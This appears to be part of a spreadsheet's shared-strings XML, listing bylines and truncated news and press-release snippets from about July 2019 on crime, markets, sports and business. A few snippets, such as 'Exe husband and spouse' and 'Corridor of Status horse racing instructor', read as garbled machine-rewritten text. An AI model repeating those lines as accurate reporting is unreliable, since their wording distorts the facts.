    <t>Jayden Collins</t>
  </si>
  <si>
    <t>Russell Crowe narrates the behind-the-scenes look of Leeds United's 2018/19 season</t>
  </si>
  <si>
    <t>Sets out bold targets on emissions reduction, fuel efficiency Commits to enforcing sustainable practices across the supply chain...</t>
  </si>
  <si>
    <t>Dayne Patterson</t>
  </si>
  <si>
    <t>Police have a released a composite sketch of a man they wish to contact as they continue their investigation into the double homicide of two individuals in their 20s that happened in northern BC earlier this month. Police discovered the bodies of 23-year-old Australian Lucas Fowler and 24-year-old American Chynna Deese at 7:19 am on July 15, approximately 20 kilometres south of Liard Hot Springs. During a press conference on Monday, they confirmed that the two had been travelling through northern BC when they were shot to death. “We can now confirm that Chynna and Lucas were the victims of gun violence and that their van — a 1986 blue Chevrolet van with Alberta plates — was owned by Lucas Fowler and was being used by the couple to explore northern British Columbia," Sgt. Janelle Shoihet said. “I want to ensure that people are aware that we’re doing everything that we can in order to ensure that we can advance this investigation to the best of our abilities and find the person or persons responsible,” she later added. Police did not speak to a potential motive for the killing of the two adults. While police are currently following up with witnesses, "hours" of dash cam and CCTV footage as well as digital and forensic evidence, Shoihet said, they are asking for public assistance in identifying a man who spoke to Fowler on Hwy 97 on July 14, the day before the couple was discovered. He is described as Caucasian male with darker skin and dark hair, shorter than Fowler (who was 6'3") and may have a beard or glasses, or both. The man may be associated with an older model Jeep Cherokee with a black stripe on the hood, also fitted with a black light/bull bar with small, covered lights. He is believed to have been travelling southbound on Hwy 97. Police said they do not believe this man is a suspect. Fowler's father, Chief Inspector Stephen Fowler of the New South Wales Police Force, spoke at the press conference, describing his son as a "fun-loving guy" who had met his girlfriend and had become a perfect pair. "It's a love story that ended tragically," he said. RCMP said that the double homicide case involving Fowler and Deese could possibly be linked to another case that occurred near Dease Lake in northern BC involving two missing males and their torched vehicle. “We can’t say definitively they are [linked]. We certainly are open to those possibilities and our investigators are speaking to each other, sharing information and certainly looking at the possibility that they may be linked,” said Shoihet. “It is unusual to have two major investigations undergoing of this nature in northern BC at the same time. We recognize that there is a possibility that these could be linked.”</t>
  </si>
  <si>
    <t>BEIJING, July 22, 2019 /PRNewswire/ -- Yili Group (SHA: 600887), Asia's largest dairy firm, launched their first Mocha Coffee Ice Cream in...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 26, 2019 / The Law Offices of Vincent Wong announce that class actions have commenced on behalf of certain...</t>
  </si>
  <si>
    <t>Pune, India, July 25, 2019 (GLOBE NEWSWIRE) -- Market Overview The global synthetic monitoring market is expected to exhibit a robust...</t>
  </si>
  <si>
    <t>AP Business Writer</t>
  </si>
  <si>
    <t>LONDON — Global stock markets generally traded in narrow ranges Monday as investors awaited developments in the...</t>
  </si>
  <si>
    <t>MORE than four million people could not put food on their tables last year.</t>
  </si>
  <si>
    <t>Taking a look at some key metrics and ratios for HubSpot, Inc. (NYSE:HUBS), we note that the ROA or Return on Assets stands at...</t>
  </si>
  <si>
    <t>Simon Samano</t>
  </si>
  <si>
    <t>If Corey Anderson ends up as the next challenger to Jon Jones' UFC light heavyweight championship, you could say the foundation was laid at...</t>
  </si>
  <si>
    <t>At a ceremony attended by more than 200 government officials, students and community leaders at Universidad Autonoma de Baja...</t>
  </si>
  <si>
    <t>NovaBay® Pharmaceuticals, Inc. (NYSE American: NBY), a biopharmaceutical company focusing on commercializing Avenova® for the domestic eye...</t>
  </si>
  <si>
    <t>Lucas Day</t>
  </si>
  <si>
    <t>Geneva, NY, United States / Finger Lakes Daily News</t>
  </si>
  <si>
    <t>Dublin, July 26, 2019 (GLOBE NEWSWIRE) -- The "3D &amp; 4D Technology - Market Analysis, Trends, and Forecasts" report has been added...</t>
  </si>
  <si>
    <t>UK-based screen manufacturer, Screen Excellence has launched a new affordable line of fixed frame screens. The DISCOVERY brand features a...</t>
  </si>
  <si>
    <t>To warn local residents of the risk of psychiatric practices that can harm them and their families, Citizens Commission on Human Rights...</t>
  </si>
  <si>
    <t>The Detroit Lions have placed defensive end Trey Flowers and linebacker Steve Longa on the physically unable to perform list. In March,...</t>
  </si>
  <si>
    <t>Chris Copeland</t>
  </si>
  <si>
    <t>JetBlue Airways (NASDAQ:JBLU) issued its quarterly earnings results on Tuesday. The transportation company reported $0.60 earnings per...</t>
  </si>
  <si>
    <t>(Family Features) Invite your friends and neighbors over, spread out some comfy seating and dim the lights. Whether it’s a birthday...</t>
  </si>
  <si>
    <t>by                                         RotoWire Staff</t>
  </si>
  <si>
    <t>General manager Ryan Pace said Monday that Pineiro and Elliott Fry are even in the Bears' offseason kicker competition, Larry Mayer of the...</t>
  </si>
  <si>
    <t>Caroline Biscotti</t>
  </si>
  <si>
    <t>Investors may be taking a closer look at shares of Enterprises Finl Svc (EFSC). Let us focus in on the current opinion signal on the stock....</t>
  </si>
  <si>
    <t>Greg Ellis</t>
  </si>
  <si>
    <t>Wollongong born Rick Caballo has won four international awards for his design work. The co-founder of Dead Horse Branding recently picked...</t>
  </si>
  <si>
    <t>Natasha Mascarenhas</t>
  </si>
  <si>
    <t>Elizabeth Ashford comes from the world of politics. She advised Arnold Schwarzenegger while he was governor of California, managed several...</t>
  </si>
  <si>
    <t>RICHMOND, Va. (AP) — The nation's first elected African American governor says he's the victim of an "unsound" and "biased" investigation...</t>
  </si>
  <si>
    <t>This report focuses on the global 5G Antennas Market status, future forecast, growth opportunity, key market and key players. This...</t>
  </si>
  <si>
    <t>The "Global Vendor Neutral Archive (VNA) &amp; PACS Market Analysis &amp; Trends - Industry Forecast to 2027" report has been added to...</t>
  </si>
  <si>
    <t>0 comment Arsenal are interested in putting together a deal to sign Lille winger Nicolas Pepe. PA understands that reports of an...</t>
  </si>
  <si>
    <t>Sarita Garza</t>
  </si>
  <si>
    <t>UBS Group reissued their buy rating on shares of SThree (LON:STHR) in a research report released on Tuesday, ThisIsMoney.Co.Uk reports....</t>
  </si>
  <si>
    <t>Stock futures were slightly higher Monday at the start of a crowded week for market-moving events, including the Federal Reserve’s latest...</t>
  </si>
  <si>
    <t>by Robin MILLARD</t>
  </si>
  <si>
    <t>Britain's new Foreign Secretary Dominic Raab is a karate-loving hardcore eurosceptic who has rapidly chopped his way to the top of British...</t>
  </si>
  <si>
    <t>NEW YORK, July 24, 2019 /PRNewswire-PRWeb/ -- S. Aminah Nialiah, a native of the Northeast with a lifelong passion for dance and mother of...</t>
  </si>
  <si>
    <t>The global cybersecurity company Quttera has just launched its new server-side malware scanner. Its distinctive features are...</t>
  </si>
  <si>
    <t>Pune, July 25, 2019 (GLOBE NEWSWIRE) -- The global Diabetes Monitoring Devices Market is expected to rise owing to increasing awareness...</t>
  </si>
  <si>
    <t>SAN DIEGO (AP) — Four days after a man killed 51 people at two mosques in New Zealand, court documents show a San Diego college student...</t>
  </si>
  <si>
    <t>Photo: Variety...</t>
  </si>
  <si>
    <t>By Bronte Howard</t>
  </si>
  <si>
    <t>When Kirsty Dobbs first started having heavy periods she didn't think it would be anything to worry about. But in May, after having her...</t>
  </si>
  <si>
    <t>PARIS — Even ice cream, Italian gelato or Popsicles couldn't help this time.</t>
  </si>
  <si>
    <t>by Frank Beacham</t>
  </si>
  <si>
    <t>You have 5 remaining</t>
  </si>
  <si>
    <t>Greg WyshynskiESPN</t>
  </si>
  <si>
    <t>Artemi Panarin walked out of Madison Square Garden with the first New York Rangers jersey bearing his name draped around his shoulders like...</t>
  </si>
  <si>
    <t>NewswireToday - /newswire/ - Bradenton, FL, United States, 2019/07/23 - American retailer continues digital transformation...</t>
  </si>
  <si>
    <t>Billie Eilish has spoken candidly about her struggles with mental health. The 17-year-old singer revealed that she has suffered from body...</t>
  </si>
  <si>
    <t>Tim Dornin</t>
  </si>
  <si>
    <t>A Lamborghini driver charged over a fatal crash which killed a teenage girl in Adelaide intends to plead not guilty to dangerous driving....</t>
  </si>
  <si>
    <t>Bristol-Myers Squibb Company (NYSE: BMY) today announced that Part 1a of the Phase 3 CheckMate -227 trial evaluating Opdivo® (nivolumab)...</t>
  </si>
  <si>
    <t>Amateur and professional photographers can enter their images of Port Coquitlam’s natural environment for the city’s 2020 calendar.</t>
  </si>
  <si>
    <t>DUBLIN, July 29, 2019 /PRNewswire/ -- The "Growth Opportunities in the Mauritius International and MICE Tourism Market 2019 - 2025" report...</t>
  </si>
  <si>
    <t>by John Byrne</t>
  </si>
  <si>
    <t>Actor Rebecca Callard offers her advice. "Remember to treat any audition you get as your opportunity to do some acting. Even if it’s...</t>
  </si>
  <si>
    <t>Shares of Meritage Homes Corp (NYSE:MTH) have been assigned an average recommendation of “Hold” from the twelve brokerages that are...</t>
  </si>
  <si>
    <t>Angelo Aversa talks to Johnathan from Lifetime Wellness center.</t>
  </si>
  <si>
    <t>ZAMBOANGA CITY, Zamboanga del Sur — The president of the Liga ng mga Barangay in Siay the city used to be arrested on Tuesday evening for...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 /PRNewswire-PRWeb/ -- Global Relay, the leading provider of compliance archiving, supervision, eDiscovery,...</t>
  </si>
  <si>
    <t>“Biopharmaceuticals Market” Pharmaceutical companies have streamlined drug discovery and development through adoption of...</t>
  </si>
  <si>
    <t>Hands4Hope Youth Making A Difference</t>
  </si>
  <si>
    <t>Hands4Hope recently celebrated its incredible youth volunteers at the 10th annual Youth Recognition event. Themed Sweet Endings … New...</t>
  </si>
  <si>
    <t>City News Service</t>
  </si>
  <si>
    <t>Presiding Judge Peter C. Deddeh ruled there was no legal cause to keep records sealed.</t>
  </si>
  <si>
    <t>Global Biocomposite Market by Fiber Type (Hemp, Kenaf, Flax, Jute, and Others) by Process (Compression Molding, Injection Molding, and...</t>
  </si>
  <si>
    <t>Cynthia Hall</t>
  </si>
  <si>
    <t>Moseley Investment Management Inc. raised its holdings in Netflix, Inc. (NASDAQ:NFLX) by 6.2% during the 2nd quarter, according to the...</t>
  </si>
  <si>
    <t>It is best to hire Park Press Printing for printer-related tasks to save time and enhance efficiency. Saugus, MA -- (ReleaseWire) --...</t>
  </si>
  <si>
    <t>PAUL NEWBERRY AP Sports Writer</t>
  </si>
  <si>
    <t>ATLANTA (AP) — Lucas Duda came through with Kansas City's first pinch-hit homer of the season to break a tie in the eighth inning, and the...</t>
  </si>
  <si>
    <t>Santa Maria Times Staff Report</t>
  </si>
  <si>
    <t>Welch Courtesy of Santa Barbara County Sheriff's Office {{featured_button_text}} Wesley Welch and his dog Davie. Courtesy of Santa...</t>
  </si>
  <si>
    <t>Inside Studio has created the office design for women’s fashion company, Tribal, located in Montreal, Canada.</t>
  </si>
  <si>
    <t>Inside Studio has created the office design for women’s fashion company, Tribal, located in Montreal, Canada.</t>
  </si>
  <si>
    <t>Zena Chamas</t>
  </si>
  <si>
    <t>Melbourne man Nathan has carried a giant handmade carrot around the city for the past six years as a way of bringing a little joy to others...</t>
  </si>
  <si>
    <t>WILMINGTON, DE / ACCESSWIRE / July 26, 2019 / Rigrodsky &amp; Long, P.A.: Rigrodsky &amp; Long, P.A. announces that it is investigating potential...</t>
  </si>
  <si>
    <t>James Goddard is banned from area around parliament for abuse of pro-remain MP</t>
  </si>
  <si>
    <t>U.S. Senator and Democratic presidential hopeful Bernie Sanders joined diabetes patients as they drove across the border on Sunday (July...</t>
  </si>
  <si>
    <t>Tashan Deniran-Alleyne</t>
  </si>
  <si>
    <t>The 29-year-old was linked with a move to the Emirates Stadium this summer</t>
  </si>
  <si>
    <t>Australia’s batting woes have been laid bare by teammates in a chaotic start to their Ashes tour in Southampton, where 17 wickets fell on...</t>
  </si>
  <si>
    <t>WARSAW, Ind., July 26, 2019 /PRNewswire/ -- Zimmer Biomet Holdings, Inc. (NYSE and SIX: ZBH), a global leader in musculoskeletal...</t>
  </si>
  <si>
    <t>NEW YORK, July 23, 2019 (GLOBE NEWSWIRE) -- Pawar Law Group announces that a class action lawsuit has been filed on behalf of...</t>
  </si>
  <si>
    <t>ATLANTA, July 31, 2019 /PRNewswire/ -- EmployBridge, America's largest industrial staffing firm, today released the results of its annual...</t>
  </si>
  <si>
    <t>by Benedict Brook</t>
  </si>
  <si>
    <t>At the moment it's a blink and you'll miss it change, but a subtle alteration to KFC in Australia could have an impact of mega bucket...</t>
  </si>
  <si>
    <t>Íslandsbanki: First Half 2019 Results First Half 2019 (1H19) financial highlights Profit after tax amounted to ISK 4.7bn (1H18: ISK 7.1bn)...</t>
  </si>
  <si>
    <t>Chicago Capital LLC grew its holdings in Comcast Co. (NASDAQ:CMCSA) by 19.0% during the second quarter, according to its most recent 13F...</t>
  </si>
  <si>
    <t>Tesla Inc on Wednesday missed financial targets in its second quarter despite record deliveries of its electric vehicles, adding that the...</t>
  </si>
  <si>
    <t>STEPHEN WHYNO AP Sports Writer</t>
  </si>
  <si>
    <t>RICHMOND, Va. (AP) — FedEx Field is just 22 years old but a concrete relic of stadiums past, with the clock ticking on its status as an NFL...</t>
  </si>
  <si>
    <t>A day after Johnson was booed in Scotland, he faced another tough reception from farmers — a group central to the Welsh economy — who fear...</t>
  </si>
  <si>
    <t>Former NFL offensive lineman Jeff Hatch, who had previously been candid about his own struggles with opioid addiction and substance abuse,...</t>
  </si>
  <si>
    <t>audrey morton</t>
  </si>
  <si>
    <t>We've told you before more and more people over the age of 50 are getting divorced because people want to be happy for the last part of...</t>
  </si>
  <si>
    <t>FARGO — American Airlines will launch service between Fargo and Phoenix starting Dec. 18. The route will depart from Fargo's Hector...</t>
  </si>
  <si>
    <t>Lauren Crawford</t>
  </si>
  <si>
    <t>Congratulations are in order! Lil Nas X rode his horse right into history with his hit record "Old Town Road." On Monday (July 29),...</t>
  </si>
  <si>
    <t>The European Commission has announced a call for proposal on Media Freedom and Investigative Journalism.</t>
  </si>
  <si>
    <t>Tickers: XCNQ:CANN, XOTC:UMBBF, PINX:HERTF Tags: #MedicinalMarijuana, #Mining Vancouver, B.C. - TheNewswire - July 29, 2019 - HERITAGE...</t>
  </si>
  <si>
    <t>Toronto Blue Jays Tyler Brooke @TylerDBrooke Twitter Logo Senior Analyst II With the Toronto Blue Jays suffering this season and building...</t>
  </si>
  <si>
    <t>Global CDMO partners with Kneat to Digitize their Validation work Processes [22-July-2019] LIMERICK, Ireland, July 22, 2019 /CNW/...</t>
  </si>
  <si>
    <t>MONTREAL, July 26, 2019 (GLOBE NEWSWIRE) -- Bombardier (TSX: BBD.B) will publish its financial results for the second quarter of 2019 on...</t>
  </si>
  <si>
    <t>Ken Wiebe                        More from Ken Wiebe</t>
  </si>
  <si>
    <t>HAMILTON – Anthony Coombs was taken aback, though he wasn’t exactly shocked when the Toronto Argonauts released him at the end of training...</t>
  </si>
  <si>
    <t>(Reuters) - Cardiff-based IQE Plc said on Wednesday it had started initial production for a second major customer at its recently...</t>
  </si>
  <si>
    <t>CAMARILLO, Calif. (AP) — The average U.S. price of regular-grade gasoline has dropped by 2 cents per gallon (3.8 liters) over the past two...</t>
  </si>
  <si>
    <t>In a show of improved relations the City of London and the two unions representing firefighters and police have each ratified a new...</t>
  </si>
  <si>
    <t>The company offers the first-time buyer a limited-time welcome package of more than 10% discount on their orders. This limited-time offer...</t>
  </si>
  <si>
    <t>SOURCE: Ingersoll Rand July 26, 2019 /3BL Media/ - Trane®, a leading global provider of indoor comfort solutions and services and a brand...</t>
  </si>
  <si>
    <t>Inovio Pharmaceuticals (NASDAQ:INO) and Stryker (NYSE:SYK) are both medical companies, but which is the better stock? We will compare the...</t>
  </si>
  <si>
    <t>HONOLULU (AP)  "Aquaman" star Jason Momoa is visiting Native Hawaiian protesters blocking the construction of a giant telescope on...</t>
  </si>
  <si>
    <t>Good morning and welcome to Fox News First. Here's what you need to know as you start the day ... The Democratic presidential debates,...</t>
  </si>
  <si>
    <t>A bleeding man is taken away by policemen after attacked by protesters outside Kwai Chung police station in Hong Kong, Wednesday, July 31,...</t>
  </si>
  <si>
    <t>, (AP) -- Jose Pastrano scored on a sacrifice in the top of the 10th inning to help lead the DSL Athletics to an 8-4 win over the DSL Rays1...</t>
  </si>
  <si>
    <t>- Study now fully enrolled; topline data expected in 4Q 2019 - STAMFORD, Conn., July 22, 2019 (GLOBE NEWSWIRE) -- Cara Therapeutics, Inc....</t>
  </si>
  <si>
    <t>MOSCOW (AP) — A doctor who saw Russian opposition leader Alexei Navalny in the hospital says he may have been poisoned. Anastasiya...</t>
  </si>
  <si>
    <t>Earlier this year, ProPublica and the Anchorage Daily News reported that one-third of Alaskan communities have no police officer of any...</t>
  </si>
  <si>
    <t>Danny Santana hit a grand slam and drove in a career-high six runs as the slumping Texas Rangers routed the Oakland Athletics 11-3.</t>
  </si>
  <si>
    <t>AUSTIN, Texas, July 29, 2019 /PRNewswire-PRWeb/ -- Slide UX, a user experience design consultancy, recently announced the addition of six...</t>
  </si>
  <si>
    <t>FOR IMMEDIATE RELEASE A 17-year-old arrested in February for handgun possession was again arrested early Monday morning after he admitted...</t>
  </si>
  <si>
    <t>Michael Walen</t>
  </si>
  <si>
    <t>Huntington National Bank increased its holdings in Home Depot Inc (NYSE:HD) by 0.4% in the second quarter, according to its most recent...</t>
  </si>
  <si>
    <t>The San Francisco Giants have traded Drew Pomeranz and Ray Black to the Milwaukee Brewers for Mauricio Dubon, as first suggested by way of...</t>
  </si>
  <si>
    <t>SOURCE: Merck &amp; Co., Inc. Merck was recognized on PEOPLE’s third annual 50 Companies That Care list for investing $500 million to reduce...</t>
  </si>
  <si>
    <t>SOURCE American Casting &amp; Manufacturing PLAINVIEW, N.Y., July 30, 2019 /PRNewswire/ -- Properly sealing cargo being shipped across the...</t>
  </si>
  <si>
    <t>New Truvalue AI™ allows for rapid rollout of new datasets SAN FRANCISCO, CA / ACCESSWIRE / July 24, 2019 / Truvalue Labs, the pioneer in...</t>
  </si>
  <si>
    <t>Florida Aquarium CEO Roger Germann — with a "Go big, or go home" mantra — says good leaders can’t stare at shadows. He’s ready to make a...</t>
  </si>
  <si>
    <t>The Chartered Institute of Procurement and Supply (CIPS) has appointed Sharon Morris as its General Manager for Australia and New Zealand....</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Latest on the debt and budget agreement between the White House and Congress (all times local): 6:15 p.m. House...</t>
  </si>
  <si>
    <t>Switzerland scrapped a 1.8 million Swiss franc ($1.8 million) sponsorship deal with Philip Morris International for the country's pavilion...</t>
  </si>
  <si>
    <t>Joe Denly had no qualms when Joe Root pulled rank on him to claim the number-three spot in England’s Ashes line-up and expects the first...</t>
  </si>
  <si>
    <t>Global "Gas Engine Market" 2019 Industry research report provides an In-Depth analysis that includes an executive summary, definition, and...</t>
  </si>
  <si>
    <t>The Government Accountability Office has evaluated the information security programs of federal agencies and the Office of Management and...</t>
  </si>
  <si>
    <t>Spacious and stunning, this immaculate Colonial in Indian Pond Estates in Kingston features an open layout with a flowing floor plan...</t>
  </si>
  <si>
    <t>WASHINGTON (From news reports) -- The skyrocketing cost of a U.S. college education could get even more expensive if two top college...</t>
  </si>
  <si>
    <t>Eagle Point Income Company Inc. (NYSE:EIC) (the “Company”) today announced the pricing of its initial public offering of 1,200,000 shares...</t>
  </si>
  <si>
    <t>(CNN)More than 400 locations across the United States reached record-breaking temperatures last week. During that same span, only about 100...</t>
  </si>
  <si>
    <t>TrakStar Plus supports the Patient Health Questionnaire collection through a separate TrakStar Ratings site, where patients answer the...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (4-12) OPEN CAMP: July 27, Santa Clara, California LAST YEAR: Season went awry early with QB Jimmy Garoppolo and RB Jerick...</t>
  </si>
  <si>
    <t>Sodium Dehydroacetate Market 2019 gives an in-depth and detailed research on current situation and deep study of this industry. This report...</t>
  </si>
  <si>
    <t>BRUSSELS (AP) — Belgium suffered a first death as a direct result of the record-breaking heat wave when a woman was found dead near her...</t>
  </si>
  <si>
    <t>Spread the word! Malaysia’s Muhammad Aiman’s pursuit of one day becoming ONE World Champion continues on Friday, 2 August when he squares...</t>
  </si>
  <si>
    <t>guyonclimate_mi5tor</t>
  </si>
  <si>
    <t>Sunday July 28th… Dear Diary. The main purpose of this ongoing blog will be to track United States extreme or record temperatures related...</t>
  </si>
  <si>
    <t>Patrick Bannon</t>
  </si>
  <si>
    <t>Pennsylvania Trust Co increased its position in Diageo plc (NYSE:DEO) by 1.1% during the second quarter, according to the company in its...</t>
  </si>
  <si>
    <t>LINCOLN, Neb. (AP) — Officials in Nebraska and Wyoming were scrambling Thursday to respond to an irrigation tunnel collapse that cut off...</t>
  </si>
  <si>
    <t>- 14% of tenants are asked to leave or evicted by landlords- 58% of those are due to rental arrears- One in 11 renters in Britain admit to...</t>
  </si>
  <si>
    <t>Two men have been given suspended jail sentences for causing a fire that wrecked a bike shop in Bury St Edmunds after they cremated a mouse...</t>
  </si>
  <si>
    <t>BUCHAREST — Romania’s police chief and two county officials were fired late on Friday after authorities took 19 hours to respond to emergency calls from a kidnapped 15-year-old girl who died at the hands of her captor in the interim. Interior Minister Nicolae Moga said he fired Police Chief Ioan Buda, Olt County Prefect Petre Neacsu and Olt County Police Chief Cristian Voiculescu over the case in the southern Romanian town of Caracal. The victim called the European emergency number 112 three times for help on Thursday morning, according to the emergency phone center. A 65-year-old mechanic, Gheorghe Dinca, is suspected of killing her. Police said they did not enter Dinca’s house until 19 hours after she called. Authorities struggled to locate the source of the calls and secured a search warrant even though it was not legally necessary. After getting the warrant, they waited for hours to enter the premises. “Why (authorities) waited … must be clarified,” interim general prosecutor Bogdan Licu told private television station Antena3. “A girl who by all indications could have been saved has died.” The case sparked outrage and hundreds of people gathered to protest outside the suspect’s house late on Friday. Romania’s president and prime minister called for an analysis of the response and punishment of those responsible. At the scene, police found what appeared to be human remains in a barrel and jewelry. Police suspect the remains belong to the 15-year-old victim and to an 18-year-old girl from a nearby village who was reported missing in April. Forensics analysts were working to identify the remains. (Reporting by Luiza Ilie; Editing by Cynthia Osterman)</t>
  </si>
  <si>
    <t>BATTLE CREEK, Mich., July 26, 2019 /PRNewswire/ -- Kellogg Company (NYSE: K) today announced that its Board of Directors declared a...</t>
  </si>
  <si>
    <t>Investors may be studying some short-term indicators on shares of Southern Company (SO). The current 7-day average directional indicator is...</t>
  </si>
  <si>
    <t>PITTSBURGH, July 31, 2019 /PRNewswire-PRWeb/ -- The Hamilton County, Ohio Public Safety Answering Point (PSAP) is the latest agency to...</t>
  </si>
  <si>
    <t>Kristen Anderson, Postmedia                        More from Kristen Anderson, Postmedia;Darren Makowichuk</t>
  </si>
  <si>
    <t>If you’re reading this, chances are you are a sports fan. You are a taxpayer. You like to work hard, spend your money wisely and certainly...</t>
  </si>
  <si>
    <t>CASPER, Wyo. (AP) — More than 100 operators, landowners and lawmakers packed the Wyoming Oil and Gas Conservation Commission's public...</t>
  </si>
  <si>
    <t>By Levana Hayes</t>
  </si>
  <si>
    <t>ONE of the world’s biggest hotel companies has announced it will be removing all mini toiletries from rooms in the fight against plastic....</t>
  </si>
  <si>
    <t>Maxine Eggenberger</t>
  </si>
  <si>
    <t>We never met a floral dress we didn’t like, but that’s not to say that some aren’t more interesting than others. Depending on the color...</t>
  </si>
  <si>
    <t>Bitcoin Cash (CURRENCY:BCH) traded 3% lower against the US dollar during the 1 day period ending at 23:00 PM Eastern on July 22nd. One...</t>
  </si>
  <si>
    <t>Motorists will not need to reach into their pockets for money when they cross the Hudson River from New Jersey into the city. The Port...</t>
  </si>
  <si>
    <t>Lindsey Winhoffer</t>
  </si>
  <si>
    <t>Traverso Chambers Private Wealth Management LLC reduced its holdings in shares of Procter &amp; Gamble Co (NYSE:PG) by 15.6% in the second...</t>
  </si>
  <si>
    <t>LENEXA, Kan., July 30, 2019 /PRNewswire/ -- City Wide Franchise, the franchise counterpart of the nation's premier building maintenance...</t>
  </si>
  <si>
    <t>Nicole Gaouette, CNN</t>
  </si>
  <si>
    <t>Possible US-UK cracks appear on Gulf security</t>
  </si>
  <si>
    <t>Preparing for retirement is tricky, and it takes a lot of hard work and sacrifices to be able to save enough to enjoy your golden years...</t>
  </si>
  <si>
    <t>Jessica Moore</t>
  </si>
  <si>
    <t>Private Capital Advisors Inc. purchased a new position in shares of Xilinx, Inc. (NASDAQ:XLNX) during the second quarter, according to its...</t>
  </si>
  <si>
    <t>Alex Shabad</t>
  </si>
  <si>
    <t>New surveillance video obtained by NBC Charlotte showed the so-called "Pink Lady Bandit" being led away in handcuffs.</t>
  </si>
  <si>
    <t>Caroline Horne</t>
  </si>
  <si>
    <t>Beacon (CURRENCY:BECN) traded down 21.7% against the U.S. dollar during the 1-day period ending at 15:00 PM E.T. on July 25th. Beacon has a...</t>
  </si>
  <si>
    <t>A new ground-breaking energy project is to be developed in the former mining town of Cumnock, once a powerhouse of coal production in...</t>
  </si>
  <si>
    <t>RICHARDSON, Texas, July 31, 2019 (GLOBE NEWSWIRE) -- Fossil Group, Inc. (NASDAQ: FOSL) announced today that its earnings for the second...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Million-selling novelist Julia Alvarez's next book is a story of identity and immigration that she felt compelled to write....</t>
  </si>
  <si>
    <t>MEXICO CITY — The Costa Rican Health Ministry says it has confirmed 19 deaths from consumption of alcohol tainted with methanol. The...</t>
  </si>
  <si>
    <t>Joanna Charbonneau</t>
  </si>
  <si>
    <t>Clearbridge Energy MidstreamOprtntyFdInc (NYSE:EMO) announced a quarterly dividend on Tuesday, July 23rd, Zacks reports. Stockholders of...</t>
  </si>
  <si>
    <t>Ryan Garner                        More from Ryan Garner;Codie McLachlan</t>
  </si>
  <si>
    <t>Marilyn Manson closed out the Chaos AB festival Saturday at Kinsmen Park. Codie McLachlan / Postmedia</t>
  </si>
  <si>
    <t>VICTORIA, BC / ACCESSWIRE / July 24, 2019 / FLEXIBLE SOLUTIONS INTERNATIONAL, INC. (NYSE-AMERICAN: FSI, FRANKFURT: FXT), is the developer...</t>
  </si>
  <si>
    <t>NEW YORK, July 22, 2019 (GLOBE NEWSWIRE) -- Pomerantz LLP announces that a class action lawsuit has been filed against Mammoth Energy...</t>
  </si>
  <si>
    <t>Marktech Optoelectronics</t>
  </si>
  <si>
    <t>July 23, 2019 – Latham, NY, USA – Marktech Optoelectronics, Inc. (www.marktechopto.com)(Marktech), a privately-held designer and...</t>
  </si>
  <si>
    <t>PRESS RELEASE PR Newswire</t>
  </si>
  <si>
    <t>AKRON, Ohio, July 30, 2019 /PRNewswire/ -- FirstEnergy Solutions Corp. ("FES" or "Company") has named the members of its Board of Directors...</t>
  </si>
  <si>
    <t>This study evaluates the effect of walnuts supplementation on the blood plasma alpha linolenic acid levels over a period of 6 months. 70...</t>
  </si>
  <si>
    <t>Exact Sciences Corp said on Monday it will buy peer Genomic Health Inc for about $2.8 billion in cash and stock, expanding the cancer...</t>
  </si>
  <si>
    <t>Dave's looking like a winner.</t>
  </si>
  <si>
    <t>Jem Aswad</t>
  </si>
  <si>
    <t>Click here to read the full article. Indie luminary Angel Olsen, recently featured on Mark Ronson’s “Late Night Feelings” album, will drop...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 23, 2019 /PRNewswire-PRWeb/ -- The Los Angeles employment law attorneys at Blumenthal Nordrehaug Bhowmik De Blouw LLP,...</t>
  </si>
  <si>
    <t>BROOKLYN, N.Y., July 25, 2019 /PRNewswire/ -- Theodore S. Rappaport, a New York University professor and founding director of the research...</t>
  </si>
  <si>
    <t>Gerard de Souza</t>
  </si>
  <si>
    <t>Speaking in the Goa Legislative Assembly on Wednesday, chief minister Pramod Sawant said that in the past Goa had a lower tax rate compared...</t>
  </si>
  <si>
    <t>By Matt Pilon</t>
  </si>
  <si>
    <t>A London-based think tank known for its annual prosperity ranking of countries has produced its first-ever assessment of each U.S. state,...</t>
  </si>
  <si>
    <t>Clear C2, Inc. announced today that it was recognized by CIOReview Magazine as one of their 20 Most Prominent CRM Solution Providers of...</t>
  </si>
  <si>
    <t>MarketResearchFuture.com added New Report Named “Smart Meters Market 2019: Global Industry Analysis, Market Growth and Opportunity...</t>
  </si>
  <si>
    <t>Dublin, July 24, 2019 (GLOBE NEWSWIRE) -- The "2019 North American Temporary Heating Market" report has been added to...</t>
  </si>
  <si>
    <t>Connect Transit riders will have at least five months without fare increases, and more changes in the Twin City public bus system's plans...</t>
  </si>
  <si>
    <t>Evan Lucas appeared on ABC's The Business on 22 July 2019.</t>
  </si>
  <si>
    <t>Demonstrators bang on pots and buckets as they march on Las Americas highway demanding the resignation of governor Ricardo Rossello, in San...</t>
  </si>
  <si>
    <t>Domenichelli, Kerry</t>
  </si>
  <si>
    <t>Page/Link: Page URL: HTML link: The Free Library. (2014). Retrieved Jul 31 2019 from...</t>
  </si>
  <si>
    <t>One-time Ibrahim family bodyguard Semi Ngata has pleaded not guilty to possessing an unauthorised weapon. Sydney detectives arrested the...</t>
  </si>
  <si>
    <t>ARLINGTON, Va., July 22, 2019 /PRNewswire/ -- The American Diabetes Association (ADA) strongly supports the introduction of the Insulin...</t>
  </si>
  <si>
    <t>TOKYO, July 24, 2019 (GLOBE NEWSWIRE) -- Leading semiconductor test equipment supplier Advantest Corporation (TSE: 6857) has introduced...</t>
  </si>
  <si>
    <t>Exe husband and spouse Justin Theroux and Jennifer Aniston have reunited over the weekend to mourn the passing in their dog, Dolly. WATCH:...</t>
  </si>
  <si>
    <t>NSW Premier Gladys Berejiklian has promised it won't take long to issue a new contract for the completion of the new Sydney Football...</t>
  </si>
  <si>
    <t>Brent Schrotenboer USA TODAY Printed 10:28 AM EDT Jul 23, 2019 Loading... SAN DIEGO — Corridor of Status horse racing instructor...</t>
  </si>
  <si>
    <t>Rick Bell                        More from Rick Bell</t>
  </si>
  <si>
    <t>Calgary councillor Jeff Davison speaks to media on Monday January 28, 2019. Darren Makowichuk/Postmedia</t>
  </si>
  <si>
